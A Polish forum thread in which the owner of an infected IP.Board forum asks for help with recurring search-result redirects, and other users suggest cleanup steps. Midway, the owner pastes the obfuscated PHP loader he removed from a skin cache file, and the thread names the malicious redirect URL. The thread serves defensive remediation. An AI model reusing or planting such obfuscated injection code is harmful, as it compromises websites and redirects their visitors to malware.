Wyniki wyszukiwania z Google przekierowują na inną stronę

[Obcy]

Mam sobie forum andriskos.pl . Ludzie ostatnio zaczeli mnie informować, że zanim wejdą na stronę to im się dziwne rzeczy pokazują. Zacząłem dopytywać i wygląda to tak:

1. Odpalają google i wpisują "andriskos"

2. W wynikach klikają na link odsyłający do forum, ale zamiast tego odpalają się rózne strony.

 

Przetestowałem to i rzeczywiście raz (wyglada na to, że raz dziennie) mnie przekierowało na

http://filestore321.com/download.php?id=1838a21b

Wygląda, że coś załapałem,  ale nie bardzo wiem gdzie szukać infekcji.

Na forum mam zainstalowane seopilot i prolink. Moze to one robią takie jaja?

 

Mądre głowy, help.

[Jurij]

Jak to gdzie? Na FTP. Zrób backup tego co masz na FTP, w drugim folderze przygotuj sobie tę samą wersję IPB z Client Area + modyfikacje zainstalowane, przy pomocy programu WinMerge porównaj z oryginalnymi plikami i będziesz miał różnice jak na dłoni. Przy okazji popatrz czy nie ma złośliwych plików, zmian w zawartości plików...

[DawPi]

To samo przerabiałem niedawno. To jest zainfekowane forum.

Polecam: http://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27

[Obcy]

Odinstalowałem seopilot i prolink. Przeinstalowałem skina + upgrade do 3.4.7. Póki co ustało. Zobaczymy co dalej bedzie.

[DawPi]

Otwieram na prośbę.

[Obcy]

Dalej mam ten syf. Opiszę co robiłem po kolei. Liczę na pomoc bo mi juz brakuje wiedzy / pomysłów jak się tego pozbyć.

 

1. Odinstalowałem na forum wszystkie dodatki (aby po wrzuceniu świeżych plików nie mieć odwołań do nieistniejących ma FTP pluginów)

2. Wywaliłem wszystkie pliki z FTP.

3. Zmieniłem hasła do DirectAdmina, Bazy, FTP.

4. Wrzuciłem czystą paczkę z client area i zainstalowałem na nowej bazie.

5. Przepiałem się na starą bazę.

6. Przerzuciłem z backupu niezbędne obrazki, zwracając uwagę aby były to tylko i wyłącznie pliki graficzne (logo, rangi, emoty, katalog z grafikami dodatkowymi [banery, belki i inne takie])

 

Po dwóch dniach znowu mam przekierowania

WinMerge wywala mi zbyt dużo różnic abym mógł to sam ogarnąć. Większość w /cache. Mam raport z WinMerge jeśli ktoś zechciałby zerknąć.

Czy jest coś jeszcze co mógłbym zrobić aby pozbyć się tego syfu?

 

A może to ja mam syf na PC i sam infekuje stronę / mam wycieki haseł ?

Podpowiedzcie coś proszę. 

[Jurij]

 

A może to ja mam syf na PC i sam infekuje stronę / mam wycieki haseł ?

 

Mamy zgadywać? Eset online, adwcleaner, malwarbytes, hitmanpro i jedziesz...

 

A co do Twoich wyczynów, to brak mi słów. Napisałem Ci wyżej co wystarczy zrobić.

[Obcy]

Moje wyczyny pomińmy. Chciałem mieć pewność czystych plików.

Zasadnicze pytanie: czy to co zrobiłem (opis wyżej) gwarantuje, że ten syf został usunięty z serwera ?

Bo jeśli tak to idę zaraz na łapka (system świeży, zabezpieczony) i stamtąd jeszcze raz zmienię hasła i wrzucę świeże pliki. 

 

@Juri

to, że masz większą wiedzę nie obliguje Cie do bycia szorstkim.

[DawPi]

Weź pod uwagę, że twórcy takich wirusów są coraz sprytniejsi. Musisz sprawdzić tabelę w bazie danych z dodatkami, czyli core_hooks_files i wszelakie odwołania do podejrzanych plików usunąć. Często gęsto wirus jest zakamuflowany w pliku graficznym (!) do którego taki spreparowany wpis się odwołuje. Inna sprawa, że możesz mieć coś wsadzone do skina, a tym samym to nie jest zapisane na FTP tylko w bazie danych i czyszczenie plików nic nie daje.

Sprawdź też katalogi wyżej forum - tam się potrafią dziać cuda. Szczególnie jeśli masz inne strony na tym samym serwerze.

[Obcy]

Po pomocy DawPi było 2-3 dni spokoju.

Doinstalowałem: SB, dzwiek do sb,  skin, język pl. I znowu mam syf w 

/cache/skin_cache/cacheid_19/skin_global.php

Syf usunąłem a wyglądał tak:

$pk='bdc088c99ad373bb3d0c2d8c378459f8';
$rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.';


$pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx';
$pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK[';
$f='%t%'.substr($rsa,566,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Jedyne co mi się nasuwa to to, że to coś siedzi w bazie i wraca przy rebuildzie skina.

Nie mam już siły na to...i uprzedzając hejty, nie stać mnie na płatną pomoc (utrzymuję się z renty)

 

Czy ktoś może mi poradzić jak pozbyć się tego raz na zawsze ?

[DawPi]

Zrób wszystko wg tego poradnika: https://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27

[Jurij]

Może to się wydać szorstkie co powiem (ponoć mi się to zdarza) ale autor nie chce upiększyć swojego samochodu, tylko pozbyć się spamu z forum i ten poradnik chyba mu się nie przyda

 

@ Obcy:

 

Mówiłem Ci co robić...

 

1. Zbadaj swój komputer i wyczyść go do ostatniego wirusa.

2. Pozmieniaj hasła.

3. Przeanalizuj zawartość ftp, usuń podejrzane pliki, poszukaj zmian w kodzie z oryginalnymi plikami za pomocą WinMerge...

4. Dopiero potem zajmij się bazą.

[Obcy]

@DawPi

@jurij

 

Zastosowałem się do Waszych rad, ale niestety to coś powraca. Z nowości na które naprowadziła mnie moja moderatorka:

Stwierdziła ona, że Infekcja wraca w poniedziałki. I rzeczywiście bo wczoraj było ok a dziś już znowu jest redirect. Dodatkowo skin_global.php ma inną datę niż zaraz po tym jak go edytowałem i wywaliłem dziwny kod.

Zerknąłem w ACP-zadania i jedyne co się wykonuje w poniedziałki o 3 rano to - Minify Cleanup Clean out old files created by minify.

Jest coraz więcej śladów gdzie tego syfu szukać, ale sam sobie nie poradzę. Może teraz WY mądre głowy jakoś mi pomożecie.

[Jurij]

Napisz ticket do IPS, warto by się temu przyjrzeli... Może to jakaś nowa luka... Czy ktoś inny oprócz Ciebie ma dostęp do FTP?

[Macsch15]

W zadaniach systemowych masz jakiś podejrzany proces? To VPS?

 

System Zadania

 

Tutaj ktoś ma podobną infekcję: http://ipbskins.ru/forum/topic13571.htmlwrzuć to w jakiś translator jeżeli nie znasz Rosyjskiego.

[Obcy]

Dokładnie problem taki jak moj. Moim bledem bylo niezaaplikowanie laty na czas...a gdy to zrobilem to już było "po zawodach"

SSy z procesów wklejam poniżej, ja nie widzę tam nic podejrzanego.

http://prntscr.com/65ta56
http://prntscr.com/65tab0
http://prntscr.com/65tafz
http://prntscr.com/65tanq

Tak, to VPS więc zapuściłem AI-Bolit ze strony, którą dałeś ETA: 1h40m - zobaczymy co znajdzie. Z tym, że tam max wersja ipb to 3.3.4 ale może coś wylezie.

Support odpisał mi, że infekcjami sie nie zajmuje i mam sam sobie radzić.

 

EDIT

do FTP mam dostęp tylko ja. Natomiast jest drugi admin z full dostępem do ACP....

Edytowane 16 Lutego 2015 przez Obcy

[Obcy]

Przepraszam, że oddzielny post, ale chciałem aby to nie umknęło.
Raport z AI-Bolit  

http://andriskos.pl/banery/raport.rar

Ja z tego nic nie mogę wyłuskać

Edytowane 16 Lutego 2015 przez Obcy

[Jurij]

Terapia:

 

 

Основная суть лечения заключается в:

• Проверка шаблона includeJS (Глобальные) в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.
• Обновления форума до актуальной версии со всеми патчами безопасности (или хотябы установка ихних)
• Смена паролей для:
  - всех (!) пользователей имеющих доступ в АЦ
  - базе данных
  - фтп
• Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума). Проверка, как правило, длится несколько дней.

 

 

Tłumaczenie:

 

Leczenie forum polega na:

 

• sprawdzenie szablonu includeJS (Globalne) w ACP. Wyczyszczenie pamięci podręcznej w celu usunięcia szkodliwego kodu z pamięci podręcznej.
• zaktualizowanie foum do najnowszej wersji wraz ze wszystkimi łatkami. (Pliki IPB w Client Area zawierają już wszystkie łatki).
• zmiana haseł dla:

               - wszystkich (!) użytkowników posiadających dostęp do ACP,

               - bazy danych,

               - ftp

• Dodanie forum do Yandex / Google Webmaster Tools z poleceniem sprawdzenia strony pod względem bezpieczeństwa (to przyspieszy ponowne sprawdzenie forum). To potrwa kilka dni.

 

Ale to wszystko nie gwarantuje sukcesu, trzeba sprawdzać pliki, czy nie zawierają takich kwiatków jak: eval, assert, base64_decode, preg_replace i złośliwego kodu. Można skorzystać ze skanera www.revisium.com/ai/ 

 

@ Obcy: czego nie rozumiesz? Masz listę plików które masz sprawdzić. Jedne są oznaczone jako krytyczne, inne jako zawierające szkodliwy kod, inne jako podszywające się pod pliki php ale nie będące nimi... Sprawdź to wszystko. Masz podane ścieżki dostępu

[Obcy]

Przepraszam za upierdliwość level hard. Poniżej wklejam zawartość z dwóch szablonów jakie mam zainstalowane. Czy są one czyste ?

 

Wygląd  >  Zarządzaj stylami i szablonami  >  Zarządzaj szablonami w IP.Board > includeJS

 

Wygląd  >  Zarządzaj stylami i szablonami  >  Zarządzaj szablonami w Andriskos > includeJS

 

1. <if test="minifyjs:|:$this->settings['use_minify']">
   	<if test="remoteloadjs:|:$this->settings['remote_load_js']">
   		<script type='text/javascript' src='<if test="usehttpsprototype:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script>
   		<script type='text/javascript' src='<if test="usehttpsscriptaculous:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script>
   	<else />
   		<script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&g=js'></script>
   	</if>
   	<script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&charset={$this->settings['gb_char_set']}&f={parse expression="PUBLIC_DIRECTORY"}/js/ipb.js,cache/lang_cache/{$this->lang->lang_id}/ipb.lang.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.hovercard.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.quickpm.js<if test="hasjsmodules:|:count($jsModules)">,{parse expression="PUBLIC_DIRECTORY"}/js/ips.{parse expression="implode('.js,' . PUBLIC_DIRECTORY . '/js/ips.', array_unique( array_keys( $jsModules ) ) )"}.js</if>' charset='{$this->settings['gb_char_set']}'></script>
   <else />
   	<if test="nominifyremoteloadjs:|:$this->settings['remote_load_js']">
   		<script type='text/javascript' src='<if test="nmusehttpsp:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script>
   	<else />
   		<script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/prototype.js'></script>
   	</if>
   	<script type='text/javascript' src='{$this->settings['js_base_url']}js/ipb.js?ipbv={$this->registry->output->antiCacheHash}&load=quickpm,hovercard,{parse expression="implode(',', array_unique( array_keys( $jsModules ) ) )"}'></script>
   	<if test="nominifyremoteloadjs2:|:$this->settings['remote_load_js']">
   		<script type='text/javascript' src='<if test="nmusehttpss:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script>
   	<else />
   		<script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/scriptaculous/scriptaculous-cache.js'></script>
   	</if>
   	<script type="text/javascript" src='{$this->settings['cache_dir']}lang_cache/{$this->lang->lang_id}/ipb.lang.js?nck={$this->settings['noCacheKey']}' charset='{$this->settings['gb_char_set']}'></script>
   </if>
   {parse template="liveEditJs" group="global"}
   <if test="isLargeTouch:|:$this->registry->output->isLargeTouchDevice()">
   <script type="text/javascript" src='{$this->settings['js_base_url']}js/3rd_party/iscroll/iscroll.js'></script>
   </if>
   

2. 1. <if test="minifyjs:|:$this->settings['use_minify']">
      	<if test="remoteloadjs:|:$this->settings['remote_load_js']">
      		<script type='text/javascript' src='<if test="usehttpsprototype:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script>
      		<script type='text/javascript' src='<if test="usehttpsscriptaculous:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script>
      	<else />
      		<script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&g=js'></script>
      	</if>
      	<script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&charset={$this->settings['gb_char_set']}&f={parse expression="PUBLIC_DIRECTORY"}/js/ipb.js,cache/lang_cache/{$this->lang->lang_id}/ipb.lang.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.hovercard.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.quickpm.js<if test="hasjsmodules:|:count($jsModules)">,{parse expression="PUBLIC_DIRECTORY"}/js/ips.{parse expression="implode('.js,' . PUBLIC_DIRECTORY . '/js/ips.', array_unique( array_keys( $jsModules ) ) )"}.js</if>' charset='{$this->settings['gb_char_set']}'></script>
      <else />
      	<if test="nominifyremoteloadjs:|:$this->settings['remote_load_js']">
      		<script type='text/javascript' src='<if test="nmusehttpsp:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script>
      	<else />
      		<script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/prototype.js'></script>
      	</if>
      	<script type='text/javascript' src='{$this->settings['js_base_url']}js/ipb.js?ipbv={$this->registry->output->antiCacheHash}&load=quickpm,hovercard,{parse expression="implode(',', array_unique( array_keys( $jsModules ) ) )"}'></script>
      	<if test="nominifyremoteloadjs2:|:$this->settings['remote_load_js']">
      		<script type='text/javascript' src='<if test="nmusehttpss:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script>
      	<else />
      		<script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/scriptaculous/scriptaculous-cache.js'></script>
      	</if>
      	<script type="text/javascript" src='{$this->settings['cache_dir']}lang_cache/{$this->lang->lang_id}/ipb.lang.js?nck={$this->settings['noCacheKey']}' charset='{$this->settings['gb_char_set']}'></script>
      </if>
      {parse template="liveEditJs" group="global"}
      <if test="isLargeTouch:|:$this->registry->output->isLargeTouchDevice()">
      <script type="text/javascript" src='{$this->settings['js_base_url']}js/3rd_party/iscroll/iscroll.js'></script>
      </if>
      
      <!-- tomchristian.co.uk Custom JS -->
      <script type="text/javascript">
      	isjQuery = false;
      	if (!window.jQuery) {
      		document.write("<" + "script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'></" + "script>");
      		isjQuery = true;
      	}
      </script>
      <script type="text/javascript">
      	if(isjQuery){
      		tcJq = jQuery.noConflict();
      	} else {
      		tcJq = jQuery;
      	}
      </script>
      <script type="text/javascript" src="{$this->settings['img_url']}/_custom/js/main.js"></script>
      <script type='text/javascript' src='{$this->settings['img_url']}/_custom/colorPicker/js/colorpicker.js'></script>
      

Edytowane 16 Lutego 2015 przez Obcy

[Jurij]

Wiesz co... Zainstaluj sobie świeże forum IPB na localhoście, wgraj te style których używasz i porównuj zawartość za pomocą programu WinMerge.

[semenedar]

Do Autora tematu, skup się bardziej na tej poradzie:

 

Sprawdź też katalogi wyżej forum - tam się potrafią dziać cuda. Szczególnie jeśli masz inne strony na tym samym serwerze.

 

Czy są inne strony na tym samym serwerze? Nie ważne pod jaką domenę są podłączone. Kiedyś, ze dwa lata temu miałem taką przypadłość, że moje forum było atakowane przez to, że zaniedbałem inną stronę na tym samym serwerze. Tamta strona akurat też była w IP Board a plik znajdował się w katalogu admin/skin_cp tej drugiej instalacji IP Board. Był to jeden dodatkowy plik skin_cp.php Miałem podłe przekierowania w godzinach "szczytu formowego" wszystko więc wskazywało na to, że nie były to przypadkowe akcje, tylko "wywoływał" je człowiek o określonej godzinie. Podczas ataku, modyfikowany był plik conf_global.php do którego dopisywane było przekierowanie. Nic więc nie dawały żadne zabiegi, żadne zmiany haseł do ACP, do baz, żadne wywalania plików, żadne backupy. Pomimo że plik conf_global.php miał prawa dostępu uniemożliwiające zapis, ten zapis i tak następował. Skoro wywalałeś wszystko, a mimo to, walczysz z plikami do których dopisywany jest złośliwy kod, to moim zdaniem szukasz infekcji w złym miejscu.

 

Pozdrawiam,

Sem